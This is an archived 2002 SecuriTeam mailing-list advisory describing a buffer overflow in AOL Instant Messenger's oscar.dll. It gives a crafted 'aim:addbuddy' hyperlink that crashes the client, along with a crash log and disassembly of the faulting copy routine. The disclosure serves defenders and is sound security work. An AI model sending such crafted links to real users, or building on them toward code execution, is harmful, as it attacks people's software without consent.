[NEWS] AIM Remote Buffer Overflow

From: support@securiteam.com
Date: 03/09/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Sat,  9 Mar 2002 13:01:17 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  AIM Remote Buffer Overflow
------------------------------------------------------------------------

SUMMARY

AOL's Instant Messenger client (AIM) suffers from a buffer overflow
vulnerability in the file oscar.dll. The vulnerability allows stack
overwriting and possibly leads to executing arbitrary code.

DETAILS

Vulnerable systems:
AIM version 4.8.2646

The buffer overflow occurs when you send a specially crafted message to an
AIM user.

To see the buffer overflow follow the following steps:
1) Make sure you have AIM 4.8.2646 installed.
2) Open a new IM window and click the link button to setup a hyperlink for
your buddy.
3) Input the exact text into the link:
   aim:addbuddy?screenname=12345678,12345678,12345678,12345678,12345678,
   12345678,12345678,12345678,12345678,12345678,12345678&groupname=
   12345678,12345678,12345678,12345678,12345678,12345678,12345678
   ,12345678,12345678,12345678,
4) The text can be anything as long as it meets the format of 8 characters
for each word to add as a screenname and a groupname, the instances should
be 11 for the screenname and 10 for the groupname.
5) A memory dump will occur as soon as the hyperlink is clicked by either
side (You or your buddy).

This was taken after the buffer overflow occurred from the Drwatson log:

function: o_strncpy
 1218b4f9 8b4508 mov eax,[ebp+0x8] ss:00c
 1218b4fc 3b450c cmp eax,[ebp+0xc] ss:00c
 1218b4ff 7419 jz LoadRendezvousString+0x39f6 (
 1218b501 8a06 mov al,[esi]
 1218b503 8807 mov [edi],al
 1218b505 47 inc edi
 1218b506 ff4508 inc dword ptr [ebp+0x8] ss:00c
 1218b509 46 inc esi
 1218b50a 43 inc ebx
 1218b50b 8a06 mov al,[esi]
FAULT ->1218b50d 8807 mov [edi],al
 1218b50f 47 inc edi
 1218b510 ff4508 inc dword ptr [ebp+0x8] ss:00c
 1218b513 46 inc esi
 1218b514 43 inc ebx
 1218b515 803e00 cmp byte ptr [esi],0x0
 1218b518 75cf jnz LoadRendezvousString+0x3bc5 (
 1218b51a 8b4d0c mov ecx,[ebp+0xc] ss:00c
 1218b51d 3bf9 cmp edi,ecx
 1218b51f 7312 jnb OscoreUseCurrentAcceleratorTable+
 1218b521 2bcf sub ecx,edi
 1218b523 33c0 xor eax,eax
 
Below is a portion of the asm code for the file oscar.dll:
text:1218B4E9 loc_1218B4E9: ; CODE XREF: o_strncpy+61 j
text:1218B4E9 cmp edi, [ebp+lpsz]
text:1218B4EC jnb short loc_1218B533
text:1218B4EE push esi ; lpsz
text:1218B4EF call ds:CharNextA
text:1218B4F5 cmp eax, ebx
text:1218B4F7 jnz short loc_1218B50B
text:1218B4F9 mov eax, [ebp+arg_0]
text:1218B4FC cmp eax, [ebp+lpsz]
text:1218B4FF jz short loc_1218B51A
text:1218B501 mov al, [esi]
text:1218B503 mov [edi], al
text:1218B505 inc edi
text:1218B506 inc [ebp+arg_0]
text:1218B509 inc esi
text:1218B50A inc ebx

text:1218B50B loc_1218B50B: ; CODE XREF: o_strncpy+40 j
text:1218B50B mov al, [esi]
text:1218B50D mov [edi], al ; <<<---HERE IS THE P
text:1218B50F inc edi
text:1218B510 inc [ebp+arg_0]
text:1218B513 inc esi
text:1218B514 inc ebx
text:1218B515 cmp byte ptr [esi], 0
text:1218B518 jnz short loc_1218B4E9

text:1218B51A loc_1218B51A: ; CODE XREF: o_s
text:1218B51A ; o_strncpy+48 j
text:1218B51A mov ecx, [ebp+lpsz]
text:1218B51D cmp edi, ecx
text:1218B51F jnb short loc_1218B533
text:1218B521 sub ecx, edi
text:1218B523 xor eax, eax
text:1218B525 mov edx, ecx
text:1218B527 shr ecx, 2
text:1218B52A repe stosd
text:1218B52C mov ecx, edx
text:1218B52E and ecx, 3
text:1218B531 repe stosb
text:1218B533
 
Here are the stack variables:
00000000 s db 4 dup(?)
00000004 r db 4 dup(?)
00000008 arg_0 dd ?
0000000C lpsz dd ? ; offset (FFFFFFFF)
00000010 arg_8 dd ?
 

This issue has not been tested on third party software that supports the
oscar protocol.

ADDITIONAL INFORMATION

The information has been provided by NtWaK0 & Recon.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.